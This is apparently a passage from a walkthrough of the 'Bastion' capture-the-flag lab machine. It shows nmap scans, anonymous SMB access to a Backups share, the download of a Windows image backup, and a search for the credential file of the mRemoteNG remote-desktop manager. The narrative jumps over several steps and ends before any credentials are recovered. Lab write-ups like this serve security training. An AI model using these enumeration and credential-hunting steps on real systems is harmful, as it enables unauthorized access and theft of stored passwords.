$ sudo nmap -sS 10.129.136.29 [sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:48 EST Nmap scan report for 10.129.136.29 Host is up (0.31s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 9.00 seconds
$ sudo nmap -sC -sV -p22,135,139,445 10.129.136.29 [sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:53 EST Nmap scan report for 10.129.136.29 Host is up (0.18s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s | smb2-time: | date: 2026-02-07T07:54:06 |_ start_date: 2026-02-07T07:42:50 | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2026-02-07T08:54:05+01:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds
Foothold
port 445 is open , so i can start with crackmapexec to see to enumerate any accessible shares
there’s a share called Backups which is accessible let’s connect to the share and recursively download its content
1 2 3 4 5 6 7 8 9 10 11
$ smbclient -N //10.129.136.29/Backups Try "help" to get a list of possible commands. smb: \> RECRUSE ON RECRUSE: command not found smb: \> RECURSE ON smb: \> PROMPT OFF smb: \> mget * getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd of size 37761024 as WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd (4318.0 KiloBytes/sec) (average 3746.1 KiloBytes/sec)
note.txt reads as follows
1 2 3 4
$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
there are 2 VHD files. the download of one of VHD files wasn’t complete because it was too large let’s download it again. the file is called 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
$ smbclient -N //10.129.136.29/Backups Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Feb 7 03:20:06 2026 .. D 0 Sat Feb 7 03:20:06 2026 BoYDQLtEFx D 0 Sat Feb 7 03:12:29 2026 JDBGIMYOGA.txt A 0 Sat Feb 7 03:20:06 2026 note.txt AR 116 Tue Apr 16 06:10:09 2019 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019 SWMJUATQPY.txt A 0 Sat Feb 7 03:12:43 2026 WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1177226 blocks available smb: \> timeout 300000 io_timeout per operation is now 300000 smb: \> RECURSE ON smb: \> prompt OFF smb: \> RECURSE OFF smb: \> cd WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\ smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> mget 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
and on a second terminal going to use watch to see the progress of the download to make sure its not stuck if the file size increases every refresh that means its downloading
1 2 3 4 5
$ watch -n 1 ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
Every 1.0s: ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd kali: Sat Feb 7 03:50:17 2026
-rw-r--r-- 1 kali kali 1.6G Feb 7 03:50 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
the file has finished downloading, with a total size of 5.1G
1
-rw-r--r-- 1 kali kali 5.1G Feb 7 03:58 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
let’s mount the VHD with qemu-nbd first load NBD kernel module
looking at installed applications, i found mRemoteNG which stores encrypted password in conf files
1 2 3 4 5
dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" reg query HKEY_LOCAL_MACHINE\SOFTWARE
22-02-2019 14:01 <DIR> mRemoteNG
the stored credentials can be found in confCons.xml
1 2 3 4 5 6 7
l4mpje@BASTION C:\Users\L4mpje>dir "%APPDATA%\mRemoteNG" Volume in drive C has no label. Volume Serial Number is 1B7D-E692 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG 22-02-2019 14:03 6.316 confCons.xml